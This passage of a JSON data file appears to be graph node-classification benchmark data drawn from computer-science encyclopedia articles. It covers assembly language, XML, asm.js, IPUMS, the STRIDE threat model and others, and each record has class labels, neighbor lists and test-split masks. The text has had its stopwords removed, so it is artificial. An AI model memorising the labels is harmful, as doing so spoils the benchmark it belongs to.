infrastructures well 1990s early microcomputers relied hand-coded assembly language including operating systems large applications systems severe resource constraints imposed idiosyncratic memory display architectures provided limited buggy system services perhaps important lack first-class high-level language compilers suitable microcomputer use psychological factor may also played role first generation microcomputer programmers retained hobbyist wires pliers attitude commercial context biggest reasons using assembly language minimal bloat size minimal overhead greater speed reliability typical examples large assembly language programs time ibm pc dos operating systems turbo pascal compiler early applications spreadsheet program lotus 1-2-3 assembly language used get best performance sega saturn console notoriously challenging develop program games 1993 arcade game nba jam another example assembly language long primary development language many popular home computers 1980s 1990s msx sinclair zx spectrum commodore 64 commodore amiga atari st large part interpreted basic dialects systems offered insufficient execution speed well insufficient facilities take full advantage available hardware systems systems even integrated development environment ide highly advanced debugging macro facilities compilers available radio shack trs-80 successors capability combine inline assembly source high-level program statements upon compilation built-in assembler produced inline machine code always debates usefulness performance assembly language relative high-level languages although assembly language specific niche uses important see tools optimization tiobe index programming language popularity ranks assembly language 11 ahead visual basic example assembler used optimize speed optimize size case speed optimization modern optimizing compilers claimed render high-level languages code run fast hand-written assembly despite counter-examples found complexity modern processors memory sub-systems makes effective optimization increasingly difficult compilers well assembly programmers moreover increasing processor performance meant cpus sit idle time delays caused predictable bottlenecks cache misses i/o operations paging made raw code execution speed non-issue many programmers situations developers might choose use assembly language assembly language still taught computer science electronic engineering programs although programmers today regularly work assembly language tool underlying concepts remain important fundamental topics binary arithmetic memory allocation stack processing character set encoding interrupt processing compiler design would hard study detail without grasp computer operates hardware level since computer behavior fundamentally defined instruction set logical way learn concepts study assembly language modern computers similar instruction sets therefore studying single assembly language sufficient learn basic concepts ii recognize situations use assembly language might appropriate iii see efficient executable code created high-level languages",
    "neighbors": [
      6148,
      6160,
      2066,
      22,
      8221,
      10273,
      45,
      4151,
      8262,
      2120,
      8273,
      6226,
      6228,
      2137,
      96,
      10340,
      6248,
      8326,
      10387,
      6296,
      154,
      4255,
      2224,
      8369,
      6325,
      191,
      8388,
      6352,
      213,
      219,
      226,
      228,
      10469,
      10470,
      8429,
      8438,
      2304,
      6403,
      8454,
      10508,
      273,
      6420,
      8474,
      284,
      6430,
      10533,
      305,
      309,
      8502,
      4409,
      4410,
      321,
      2374,
      10571,
      8524,
      341,
      10584,
      6501,
      6502,
      6503,
      8549,
      8554,
      8556,
      372,
      6528,
      8576,
      4483,
      8582,
      4493,
      398,
      8590,
      4516,
      428,
      4530,
      4533,
      6596,
      8644,
      4553,
      10703,
      470,
      2519,
      477,
      10720,
      8675,
      8680,
      10730,
      499,
      6652,
      2556,
      10750,
      512,
      516,
      518,
      4614,
      6664,
      8710,
      4630,
      8732,
      10786,
      547,
      4645,
      556,
      2605,
      10796,
      8761,
      4667,
      2620,
      10813,
      6718,
      576,
      2626,
      10819,
      8774,
      585,
      2637,
      2638,
      6741,
      6742,
      602,
      604,
      2652,
      6753,
      2658,
      10851,
      2665,
      6772,
      2680,
      8830,
      639,
      8831,
      2691,
      10883,
      6797,
      4764,
      671,
      4770,
      8866,
      6821,
      4777,
      682,
      10921,
      8876,
      692,
      6837,
      2751,
      8898,
      8902,
      10953,
      10964,
      731,
      4838,
      10991,
      2804,
      2811,
      11003,
      11009,
      8966,
      6919,
      6921,
      6924,
      8973,
      11023,
      8976,
      787,
      797,
      6950,
      9003,
      2861,
      9006,
      11059,
      823,
      4928,
      847,
      2903,
      4957,
      868,
      4964,
      4966,
      2925,
      2936,
      4985,
      4995,
      4998,
      7053,
      7071,
      7076,
      5036,
      9133,
      5040,
      5044,
      7097,
      963,
      966,
      11219,
      11229,
      7139,
      3049,
      7147,
      7173,
      9224,
      11279,
      9245,
      11295,
      5160,
      5165,
      3134,
      9291,
      1100,
      7245,
      3157,
      3159,
      7269,
      7273,
      1130,
      7274,
      7281,
      9330,
      9331,
      11384,
      1147,
      7292,
      9345,
      9346,
      9361,
      9366,
      11416,
      9370,
      7326,
      1183,
      11424,
      3233,
      9391,
      1203,
      5306,
      5312,
      1219,
      1247,
      7392,
      7395,
      1253,
      11494,
      1259,
      5358,
      5361,
      11506,
      11513,
      3323,
      7421,
      1278,
      5380,
      3339,
      5395,
      3359,
      9507,
      7462,
      7471,
      11574,
      7497,
      7501,
      9549,
      5457,
      11601,
      3413,
      7531,
      11635,
      5492,
      3446,
      11644,
      9599,
      5503,
      1409,
      3459,
      3462,
      3470,
      5527,
      9626,
      1435,
      9628,
      11674,
      9639,
      7616,
      9668,
      7627,
      1497,
      1515,
      9714,
      7689,
      3594,
      9739,
      5651,
      9748,
      3613,
      5663,
      5677,
      5680,
      9780,
      1591,
      7739,
      5697,
      1606,
      5711,
      5714,
      7772,
      9820,
      5733,
      5744,
      3705,
      9871,
      5790,
      1702,
      5803,
      9907,
      5814,
      9911,
      5823,
      9921,
      7876,
      9926,
      1735,
      5833,
      7883,
      9931,
      9932,
      5840,
      7889,
      5845,
      9964,
      1776,
      9977,
      9978,
      1791,
      9996,
      7954,
      5911,
      3876,
      10026,
      3886,
      7983,
      1841,
      10040,
      1849,
      1853,
      3904,
      3911,
      5982,
      8037,
      3960,
      8057,
      1915,
      6016,
      1922,
      8082,
      6047,
      1952,
      6056,
      6065,
      6074,
      6075,
      8125,
      10173,
      8136,
      4042,
      8143,
      6109,
      6128,
      4090,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 478,
    "label": 2,
    "text": "Your_Phone:phone phone app developed microsoft windows 10 connect android ios devices first shown microsoft build 2018 allows see recent photos taken android phone directly windows 10 pc/tablet also used sending sms messages right pc comes preinstalled windows 10 october 2018 update replaces old phone companion phone app used mirror screen android phone however currently phones supported feature beta.at samsung ’ galaxy note10 launch event microsoft teased new phone app feature might soon allow make receive phone calls may 26 2015 microsoft announced phone companion designed help users connect pc whatever smartphone use — windows phone android ios also confirmed cortana digital assistant app arrive android ios previously available windows devices may 7 2018 microsoft announced phone app build 2018 event allows see recent photos send sms messages",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 479,
    "label": 5,
    "text": "XML:xml extensible markup language xml markup language defines set rules encoding documents format human-readable machine-readable w3c xml 1.0 specification several related specifications—all free open standards—define xml design goals xml emphasize simplicity generality usability across internet textual data format strong support via unicode different human languages although design xml focuses documents language widely used representation arbitrary data structures used web services several schema systems exist aid definition xml-based languages programmers developed many application programming interfaces apis aid processing xml data essence extensible markup languages necessary explained markup language example see markup language § xml standard generalized markup language hundreds document formats using xml syntax developed including rss atom soap svg xhtml xml-based formats become default many office-productivity tools including microsoft office office open xml openoffice.org libreoffice opendocument apple iwork xml also provided base language communication protocols xmpp applications microsoft .net framework use xml files configuration property lists implementation configuration storage built xml many industry data standards e.g hl7 ota fpml mismo niem etc based xml rich features xml schema specification many standards quite complex uncommon specification comprise several thousand pages publishing dita xml industry data standard xml used extensively underpin various publishing formats xml widely used services oriented architecture soa disparate systems communicate exchanging xml messages message exchange format standardised xml schema xsd also referred canonical schema xml come common use interchange data internet ietf superseded gave rules construction internet media types use sending xml also defines media types codice_1 codice_2 say data xml nothing semantics rfc 7303 also recommends xml-based languages given media types ending codice_3 example codice_4 svg guidelines use xml networked context appear rfc 3470 also known ietf bcp 70 document covering many aspects designing deploying xml-based language material section based xml specification exhaustive list constructs appear xml provides introduction key constructs often encountered day-to-day use xml documents consist entirely characters unicode repertoire except small number specifically excluded control characters character defined unicode may appear within content xml document xml includes facilities identifying encoding unicode characters make document expressing characters one reason another used directly unicode code points following ranges valid xml 1.0 documents xml 1.1 extends set allowed characters include plus remaining characters range u+0001–u+001f time however restricts use c0 c1 control characters u+0009 horizontal tab u+000a line feed u+000d carriage return u+0085 next line requiring written escaped form example u+0001 must written codice_22 equivalent case c1 characters restriction backwards incompatibility introduced allow common encoding errors detected code point u+0000 null character permitted xml 1.0 1.1 document unicode character set encoded bytes storage transmission variety different ways called encodings unicode defines encodings cover entire repertoire well-known ones include utf-8 utf-16 many text encodings predate unicode ascii iso/iec 8859 character repertoires almost every case subsets unicode character set xml allows use unicode-defined encodings encodings whose characters also appear unicode xml also provides mechanism whereby xml processor reliably without prior knowledge determine encoding used encodings utf-8 utf-16 necessarily recognized every xml parser xml provides escape facilities including characters problematic include directly example five predefined entities permitted unicode characters may represented numeric character reference consider chinese character 中 whose numeric code unicode hexadecimal 4e2d decimal 20,013 user whose keyboard offers method entering character could still insert xml document encoded either codice_32 codice_33 similarly string 3 jörg could encoded inclusion xml document codice_34 codice_35 permitted however null character one control characters excluded xml even using numeric character reference alternative encoding mechanism base64 needed represent characters comments may appear anywhere document outside markup comments appear xml declaration comments begin codice_36 end codice_37 compatibility sgml string -- double-hyphen allowed inside comments means comments nested ampersand special significance within comments entity character references recognized way represent characters outside character set document encoding example valid comment codice_38 xml 1.0 fifth edition xml 1.1 support direct use almost unicode character element names attributes comments character data processing instructions ones special symbolic meaning xml less-than sign following well-formed xml document including chinese armenian cyrillic characters xml specification defines xml document well-formed text meaning satisfies list syntax rules provided specification key points fairly lengthy list include definition xml document excludes texts contain violations well-formedness rules simply xml xml processor encounters violation required report errors cease normal processing policy occasionally referred draconian error handling stands notable contrast behavior programs process html designed produce reasonable result even presence severe markup errors xml policy area criticized violation postel law conservative send liberal accept xml specification defines valid xml document well-formed xml document also conforms rules document type definition dtd addition well-formed xml document may valid means contains reference document type definition dtd elements attributes declared dtd follow grammatical rules dtd specifies xml processors classified validating non-validating depending whether check xml documents validity processor discovers validity error must able report may continue normal processing dtd example schema grammar since initial publication xml 1.0 substantial work area schema languages xml schema languages typically constrain set elements may used document attributes may applied order may appear allowable parent/child relationships oldest schema language xml document type definition dtd inherited sgml dtds following benefits dtds following limitations two peculiar features distinguish dtds schema types syntactic support embedding dtd within xml documents defining entities arbitrary fragments text and/or markup xml processor inserts dtd xml document wherever referenced like character escapes dtd technology still used many applications ubiquity newer schema language described w3c successor dtds xml schema often referred initialism xml schema instances xsd xml schema definition xsds far powerful dtds describing xml languages use rich datatyping system allow detailed constraints xml document logical structure xsds also use xml-based format makes possible use ordinary xml tools help process xs schema element defines schema relax ng regular language xml next generation initially specified oasis standard part 2 regular-grammar-based validation iso/iec 19757 dsdl relax ng schemas may written either xml based syntax compact non-xml syntax two syntaxes isomorphic james clark conversion tool—trang—can convert without loss information relax ng simpler definition validation framework xml schema making easier use implement also ability use datatype framework plug-ins relax ng schema author example require values xml document conform definitions xml schema datatypes schematron language making assertions presence absence patterns xml document typically uses xpath expressions schematron standard part 3 rule-based validation iso/iec 19757 dsdl dsdl document schema definition languages multi-part iso/iec standard iso/iec 19757 brings together comprehensive set small schema languages targeted specific problems dsdl includes relax ng full compact syntax schematron assertion language languages defining datatypes character repertoire constraints renaming entity expansion namespace-based routing document fragments different validators dsdl schema languages vendor support xml schemas yet extent grassroots reaction industrial publishers lack utility xml schemas publishing schema languages describe structure particular xml format also offer limited facilities influence processing individual xml files conform format dtds xsds ability instance provide infoset augmentation facility attribute defaults relax ng schematron intentionally provide cluster specifications closely related xml developed starting soon initial publication xml 1.0 frequently case term xml used refer xml together one technologies come seen part xml core specifications conceived part xml core failed find wide adoption including xinclude xlink xpointer design goals xml include shall easy write programs process xml documents despite xml specification contains almost information programmers might go processing xml infoset specification provides vocabulary refer constructs within xml document provide guidance access information variety apis accessing xml developed used standardized existing apis xml processing tend fall categories stream-oriented facilities require less memory certain tasks based linear traversal xml document faster simpler alternatives tree-traversal data-binding apis typically require use much memory often found convenient use programmers include declarative retrieval document components via use xpath expressions xslt designed declarative description xml document transformations widely implemented server-side packages web browsers xquery overlaps xslt functionality designed searching large xml databases simple api xml sax lexical event-driven api document read serially contents reported callbacks various methods handler object user design sax fast efficient implement difficult use extracting information random xml since tends burden application author keeping track part document processed better suited situations certain types information always handled way matter occur document pull parsing treats document series items read sequence using iterator design pattern allows writing recursive descent parsers structure code performing parsing mirrors structure xml parsed intermediate parsed results used accessed local variables within functions performing parsing passed function parameters lower-level functions returned function return values higher-level functions examples pull parsers include data :edit :xml perl stax java programming language xmlpullparser smalltalk xmlreader php elementtree.iterparse python system.xml.xmlreader .net framework dom traversal api nodeiterator treewalker pull parser creates iterator sequentially visits various elements attributes data xml document code uses iterator test current item tell example whether start-tag end-tag text inspect attributes local name namespace values xml attributes value text etc also move iterator next item code thus extract information document traverses recursive-descent approach tends lend keeping data typed local variables code parsing sax instance typically requires parser manually maintain intermediate data within stack elements parent elements element parsed pull-parsing code straightforward understand maintain sax parsing code document object model dom api allows navigation entire document tree node objects representing document contents dom document created parser generated manually users limitations data types dom nodes abstract implementations provide programming language-specific bindings dom implementations tend memory intensive generally require entire document loaded memory constructed tree objects access allowed xml data binding binding xml documents hierarchy custom strongly typed objects contrast generic objects created dom parser approach simplifies code development many cases allows problems identified compile time rather run-time suitable applications document structure known fixed time application written example data binding systems include java architecture xml binding jaxb xml serialization .net framework xml serialization gsoap xml appeared first-class data type languages ecmascript xml e4x extension ecmascript/javascript language explicitly defines two specific objects xml xmllist javascript support xml document nodes xml node lists distinct objects use dot-notation specifying parent-child relationships e4x supported mozilla 2.5+ browsers though deprecated adobe actionscript adopted universally similar notations used microsoft linq implementation microsoft .net 3.5 scala uses java vm open-source xmlsh application provides linux-like shell special features xml manipulation similarly treats xml data type using notation resource description framework defines data type codice_42 hold wrapped canonical xml facebook produced extensions php javascript languages add xml core syntax similar fashion e4x namely xhp jsx respectively xml application profile sgml iso 8879 versatility sgml dynamic information display understood early digital media publishers late 1980s prior rise internet mid-1990s practitioners sgml gained experience then-new world wide web believed sgml offered solutions problems web likely face grew dan connolly added sgml list w3c activities joined staff 1995 work began mid-1996 sun microsystems engineer jon bosak developed charter recruited collaborators bosak well connected small community people experience sgml web xml compiled working group eleven members supported roughly 150-member interest group technical debate took place interest group mailing list issues resolved consensus failed majority vote working group record design decisions rationales compiled michael sperberg-mcqueen december 4 1997 james clark served technical lead working group notably contributing empty-element codice_43 syntax name xml names put forward consideration included magma minimal architecture generalized markup applications slim structured language internet markup mgml minimal generalized markup language co-editors specification originally tim bray michael sperberg-mcqueen halfway project bray accepted consulting engagement netscape provoking vociferous protests microsoft bray temporarily asked resign editorship led intense dispute working group eventually solved appointment microsoft jean paoli third co-editor xml working group never met face-to-face design accomplished using combination email weekly teleconferences major design decisions reached short burst intense work august november 1996 first working draft xml specification published design work continued 1997 xml 1.0 became w3c recommendation february 10 1998 xml profile iso standard sgml xml comes sgml unchanged sgml comes separation logical physical structures elements entities availability grammar-based validation dtds separation data metadata elements attributes mixed content separation processing representation processing instructions default angle-bracket syntax removed sgml declaration xml fixed delimiter set adopts unicode document character set sources technology xml tei text encoding initiative defined profile sgml use transfer syntax html elements synchronous resource document character sets separate resource encoding codice_44 attribute invented like http metadata accompanied resource rather needed declaration link ercs extended reference concrete syntax project spread standardization project regarding east asian documents project iso-related china/japan/korea document processing expert group basis xml 1.0 naming rules spread also introduced hexadecimal numeric character references concept references make available unicode characters support ercs xml html better sgml standard 8879 revised 1996 1998 websgml adaptations xml header followed iso hytime ideas developed discussion novel xml included algorithm encoding detection encoding header processing instruction target xml space attribute new close delimiter empty-element tags notion well-formedness opposed validity enables parsing without schema first formalized xml although implemented successfully electronic book technology dynatext software software university waterloo new oxford english dictionary project risp lisp sgml text processor uniscope tokyo us army missile command iads hypertext system mentor graphics context interleaf xerox publishing system two current versions xml first xml 1.0 initially defined 1998 undergone minor revisions since without given new version number currently fifth edition published november 26 2008 widely implemented still recommended general use second xml 1.1 initially published february 4 2004 day xml 1.0 third edition currently second edition published august 16 2006 contains features contentious intended make xml easier use certain cases main changes enable use line-ending characters used ebcdic platforms use scripts characters absent unicode 3.2 xml 1.1 widely implemented recommended use need particular features prior fifth edition release xml 1.0 differed xml 1.1 stricter requirements characters available use element attribute names unique identifiers first four editions xml 1.0 characters exclusively enumerated using specific version unicode standard unicode 2.0 unicode 3.2 fifth edition substitutes mechanism xml 1.1 future-proof reduces redundancy approach taken fifth edition xml 1.0 editions xml 1.1 certain characters forbidden names everything else allowed accommodate suitable name characters future unicode versions fifth edition xml names may contain characters balinese cham phoenician scripts among many others added unicode since unicode 3.2 almost unicode code point used character data attribute values xml 1.0 1.1 document even character corresponding code point defined current version unicode character data attribute values xml 1.1 allows use control characters xml 1.0 robustness control characters introduced xml 1.1 must expressed numeric character references x7f x9f allowed xml 1.0 xml 1.1 even required expressed numeric character references among supported control characters xml 1.1 two line break codes must treated whitespace whitespace characters control codes written directly discussion xml 2.0 although organization announced plans work project xml-sw sw skunkworks written one original developers xml contains proposals xml 2.0 might look like elimination dtds syntax integration namespaces xml base xml information set base standard world wide web consortium also xml binary characterization working group preliminary research use cases properties binary encoding xml information set working group chartered produce official standards since xml definition text-based itu-t iso using name fast infoset binary infoset avoid confusion see itu-t rec x.891 iso/iec 24824-1 xml extensions regularly criticized verbosity complexity redundancy mapping basic tree model xml type systems programming languages databases difficult especially xml used exchanging highly structured data applications primary design goal however xml data binding systems allow applications access xml data directly objects representing data structure data programming language used ensures type safety rather using dom sax retrieve data direct representation xml accomplished automatically creating mapping elements xml schema xsd document members class represented memory criticisms attempt refute claim xml self-describing language though xml specification makes claim json yaml s-expressions frequently proposed simpler alternatives see comparison data serialization formats focus representing highly structured data rather documents may contain highly structured relatively unstructured content however w3c standardized xml schema specifications offer broader range structured xsd data types compared simpler serialization formats offer modularity reuse xml namespace",
    "neighbors": [
      6144,
      6145,
      10242,
      6147,
      10243,
      8201,
      4107,
      13,
      4111,
      8208,
      35,
      8227,
      2088,
      44,
      6188,
      53,
      58,
      64,
      6212,
      69,
      8262,
      4174,
      83,
      6231,
      8280,
      8285,
      8291,
      10340,
      2150,
      8303,
      8304,
      115,
      4213,
      119,
      124,
      4229,
      140,
      6284,
      8335,
      8340,
      10393,
      4255,
      160,
      8351,
      10406,
      10409,
      2221,
      10413,
      2226,
      6330,
      8378,
      4284,
      190,
      6334,
      196,
      8391,
      10452,
      10453,
      214,
      4310,
      8408,
      8413,
      8421,
      4326,
      10471,
      6381,
      10486,
      2296,
      6395,
      8443,
      6398,
      6411,
      270,
      4373,
      280,
      4376,
      10525,
      288,
      8486,
      4391,
      10537,
      2348,
      10553,
      319,
      10559,
      2377,
      332,
      10573,
      337,
      6483,
      8539,
      10593,
      6502,
      8554,
      8557,
      8558,
      8559,
      10610,
      10611,
      4477,
      2430,
      6528,
      10625,
      8584,
      2441,
      8597,
      8598,
      10645,
      6553,
      4507,
      6555,
      10654,
      2470,
      4520,
      8618,
      2481,
      434,
      4529,
      8626,
      8627,
      6585,
      6587,
      10684,
      8644,
      10693,
      4550,
      4571,
      4572,
      6629,
      487,
      10732,
      494,
      502,
      10748,
      6657,
      8717,
      8719,
      2579,
      4630,
      2590,
      545,
      6694,
      10791,
      2603,
      559,
      8751,
      10804,
      4661,
      6709,
      10808,
      8762,
      6718,
      8766,
      578,
      8771,
      10824,
      4685,
      10831,
      4688,
      10834,
      595,
      10841,
      6747,
      2658,
      4707,
      10854,
      628,
      10868,
      2679,
      632,
      4728,
      6775,
      4740,
      6795,
      6805,
      8854,
      6811,
      668,
      8860,
      10910,
      4768,
      673,
      8870,
      2739,
      4788,
      10938,
      8892,
      4797,
      10940,
      2757,
      2758,
      10953,
      6860,
      2769,
      4822,
      8921,
      8923,
      736,
      737,
      8930,
      10979,
      744,
      8940,
      2798,
      4847,
      2819,
      8965,
      2828,
      11024,
      11025,
      11030,
      8985,
      797,
      798,
      2852,
      6948,
      2861,
      11056,
      6962,
      4919,
      2875,
      9020,
      4933,
      11082,
      6990,
      4944,
      2901,
      865,
      11105,
      4974,
      11120,
      4979,
      4984,
      2948,
      11161,
      2971,
      2978,
      5026,
      9124,
      9128,
      937,
      2990,
      11189,
      5048,
      7101,
      9150,
      3008,
      11201,
      7106,
      5061,
      968,
      969,
      11210,
      974,
      11218,
      11220,
      5077,
      5078,
      9177,
      987,
      11240,
      9195,
      3052,
      5100,
      7152,
      11252,
      7157,
      5114,
      7163,
      7165,
      7168,
      11267,
      11269,
      7177,
      1034,
      9225,
      3086,
      1039,
      9244,
      9245,
      11294,
      9248,
      9258,
      11307,
      9275,
      11329,
      11332,
      1098,
      5198,
      11344,
      11353,
      11355,
      7261,
      5227,
      5228,
      1136,
      5242,
      11391,
      5255,
      1160,
      5262,
      11408,
      7318,
      11414,
      7326,
      7331,
      7340,
      11449,
      7361,
      5314,
      1223,
      5320,
      11466,
      9419,
      7373,
      7389,
      9441,
      1255,
      1258,
      9454,
      7414,
      11515,
      5372,
      7422,
      7428,
      11528,
      3341,
      9491,
      11541,
      5399,
      7455,
      9505,
      7467,
      7475,
      5431,
      3388,
      9532,
      1347,
      1348,
      5449,
      1354,
      5450,
      9552,
      3409,
      3412,
      1366,
      5467,
      1375,
      7523,
      3428,
      9579,
      3443,
      7548,
      11650,
      3460,
      3462,
      9610,
      5522,
      1427,
      7572,
      7575,
      11674,
      9629,
      7592,
      7595,
      1452,
      3509,
      3517,
      9665,
      9669,
      9670,
      7626,
      3533,
      7629,
      9683,
      5605,
      1516,
      5613,
      1520,
      5620,
      3573,
      3577,
      5635,
      5637,
      7690,
      3600,
      7700,
      3609,
      7713,
      9762,
      1578,
      9770,
      3629,
      5677,
      3639,
      7742,
      5700,
      5707,
      3664,
      9808,
      7765,
      9828,
      7785,
      1642,
      3691,
      9834,
      5743,
      9839,
      1649,
      9841,
      9843,
      9848,
      3705,
      5754,
      3708,
      7805,
      1664,
      1666,
      5765,
      1670,
      9879,
      7835,
      5788,
      9888,
      9908,
      9915,
      7878,
      7885,
      1745,
      9940,
      9941,
      9949,
      3816,
      5869,
      5876,
      7935,
      5888,
      5892,
      7943,
      3848,
      5896,
      1802,
      3853,
      5907,
      10004,
      10009,
      5915,
      10012,
      7965,
      10020,
      7974,
      5929,
      1834,
      1837,
      3894,
      5945,
      3900,
      10045,
      1856,
      3907,
      10057,
      3920,
      3921,
      8016,
      8019,
      3940,
      8039,
      3952,
      10096,
      3954,
      10097,
      6007,
      3965,
      3966,
      3971,
      8070,
      1935,
      8080,
      10129,
      3986,
      3997,
      10145,
      1956,
      6057,
      1964,
      6060,
      10159,
      6067,
      6074,
      4033,
      8130,
      4045,
      4048,
      2001,
      10193,
      4055,
      2013,
      8158,
      4064,
      4072,
      8169,
      4074,
      8170,
      2031,
      8179,
      10229,
      6135
    ],
    "mask": "None"
  },
  {
    "node_id": 480,
    "label": 1,
    "text": "IPUMS:ipums integrated public use microdata series ipums world largest individual-level population database ipums consists microdata samples united states ipums-usa international ipums-international census records well data u.s. international surveys records converted consistent format made available researchers web-based data dissemination system ipums housed institute social research data innovation interdisciplinary research center university minnesota direction professor steven ruggles ipums includes persons enumerated united states censuses 1790 2010 1890 census missing destroyed fire american community survey since 2000 current population survey since 1962 ipums provides consistent variable names coding schemes documentation across samples facilitating analysis long-term change ipums-international includes countries africa asia europe latin america 1960 forward database currently includes billion individuals enumerated 365 censuses 94 countries around world ipums-international converts census microdata multiple countries consistent format allowing comparisons across countries time periods special efforts made simplify use data losing meaningful information comprehensive documentation provided coherent form facilitate comparative analyses social economic change additional databases ipums family include journal american history described effort one great archival projects past two decades liens socio french portal social sciences gave ipums “ best site ” designation gone non-french website writing “ ipums est un projet absolument extraordinaire ... époustouflante mind-blowing ” official motto ipums use good never evil ipums data documentation available online free charge",
    "neighbors": [
      11275
    ],
    "mask": "Test"
  },
  {
    "node_id": 481,
    "label": 3,
    "text": "Gorby_no_Pipeline_Daisakusen:gorby pipeline daisakusen gorby pipeline daisakusen puzzle video game developed compile msx2 famicom fm towns published tokuma shoten 1991 game player assembles water pipe segments pipeline moscow tokyo order strengthen japan–soviet union relations permission soviet embassy game promotional materials feature name likeness mikhail gorbachev president soviet union time game development release two months tokuma shoten released gorby pipeline daisakusen japan sega published game gear handheld game console games released japan several months dissolution soviet union falling-block puzzle game small girl—wearing russian national costume sarafan kokoshnik valenki—pushes tiles representing segments water pipe two-dimensional vertical shaft shaft field play second girl also national costume waves semaphore flags give impression guides placement tiles player must quickly rotate place tiles catch conduct continuously-flowing stream water pipes one side shaft player successfully links inflow pipe one side shaft outflow pipe side row tiles disappears player earns points player routes water dead end game adds layer pipe segments player clear accumulating pipe segments stack top shaft game ends clearing requisite number rows player proceeds next game level background music level rendition russian classical music composition among selections great gate kiev final movement mussorgsky suite pictures exhibition 1874 swan theme tchaikovsky ballet swan lake 1876 flight bumblebee interlude rimsky-korsakov opera tale tsar saltan 1900",
    "neighbors": [
      5762,
      10931,
      9006,
      10855
    ],
    "mask": "Test"
  },
  {
    "node_id": 482,
    "label": 9,
    "text": "Asm.js:asm.js asm.js subset javascript designed allow computer software written languages c run web applications maintaining performance characteristics considerably better standard javascript typical language used applications asm.js consists strict subset javascript code written statically-typed languages manual memory management c translated source-to-source compiler emscripten based llvm performance improved limiting language features amenable ahead-of-time optimization performance improvements mozilla firefox first web browser implement asm.js-specific optimizations starting version 22. asm.js enables significant performance improvements web applications aim improve performance hand-written javascript code enable anything enhanced performance intended performance characteristics closer native code standard javascript limiting language features amenable ahead-of-time optimization performance improvements using subset javascript asm.js largely supported major web browsers unlike alternative approaches google native client asm.js typically written directly instead intermediate language generated use compiler takes source code language c++ outputs asm.js example given following c code int f int emscripten would output following js code function f note addition codice_1 lack type specifiers javascript bitwise operators convert operands 32-bit signed integers give integer results means bitwise zero otherwise useless operation converts value integer parameter ensures function called outside code value converted correct type also used return value case ensure result adding 1 integer otherwise could become large mark return type function conversions required asm.js optimising compiler produce highly efficient native code ahead-of-time optimising compiler conversions performed asm.js code calls asm.js code required type specifiers mean guaranteed values already correct type furthermore rather performing floating-point addition converting integer simply native integer operation together leads significant performance benefits another example calculate length string would result following asm.js code generated code variable mem8 actually byte-by-byte view typed buffer serves heap asm.js code since asm.js runs browser performance heavily depends browser hardware preliminary benchmarks c programs compiled asm.js usually within factor 2 slowdown native compilation clang much performance gain normal javascript due 100 type consistency virtually garbage collection memory manually managed large typed array simpler model dynamic behavior memory allocation deallocation narrow set well-defined integer floating point operations enables much greater performance potential optimization mozilla benchmark december 2013 showed significant improvements firefox float32 optimizations run benchmarks around 1.5× slower native better mozilla points performance natively compiled code single measure rather range different native compilers case clang gcc delivering code differing performance fact benchmarks like box2d fasta copy asm.js close closer clang clang gcc one case asm.js even beats clang slight amount box2d emscripten project provides tools used compile c c++ codebases languages converted llvm ir asm.js browsers support newest edition javascript able run asm.js code subset specification however since features added edition enable full asm.js support older browsers lacking features may encounter problems browser implementations especially optimised asm.js almost current applications based asm.js c/c++ applications compiled asm.js using emscripten mandreel mind kind applications going target asm.js near future benefit portability running browser level complexity direct port javascript would infeasible far number programming languages application frameworks programs libraries games game engines software already ported given",
    "neighbors": [
      2050,
      9736,
      6154,
      9245,
      9757,
      6176,
      10284,
      9281,
      8262,
      4171,
      84,
      6231,
      603,
      8289,
      5219,
      10860,
      10353,
      4728,
      637,
      1664,
      6791,
      8854,
      11418,
      4777,
      1713,
      3761,
      1203,
      7861,
      11449,
      5311,
      7871,
      7889,
      4822,
      8923,
      7396,
      4326,
      10991,
      10480,
      2804,
      8443,
      2304,
      259,
      1802,
      10507,
      1295,
      7951,
      2836,
      10006,
      4378,
      7455,
      803,
      7983,
      11060,
      2880,
      10057,
      2893,
      11087,
      339,
      9560,
      9561,
      10078,
      8554,
      5483,
      10097,
      7543,
      1409,
      8068,
      3462,
      8582,
      8605,
      10655,
      1952,
      5031,
      5546,
      438,
      5054,
      9152,
      5067,
      10703,
      5078,
      4056,
      10722,
      487,
      8169,
      9195,
      5101,
      10739,
      6133,
      10744,
      5114,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 483,
    "label": 4,
    "text": "STRIDE_(security):stride security stride model threats developed praerit garg loren kohnfelder microsoft identifying computer security threats provides mnemonic security threats six categories threats stride initially created part process threat modelling stride model threats used help reason find threats system used conjunction model target system constructed parallel includes full breakdown processes data stores data flows trust boundaries today often used security experts help answer question go wrong system 're working threat violation desirable property system repudiation unusual threat viewed security perspective desirable property privacy systems example goldberg record messaging system useful demonstration tension security design analysis must sometimes grapple elevation privilege often called escalation privilege privilege escalation synonymous",
    "neighbors": [
      1344,
      4163,
      612,
      7075,
      2409,
      1453,
      9293,
      4948,
      8468,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 484,
    "label": 4,
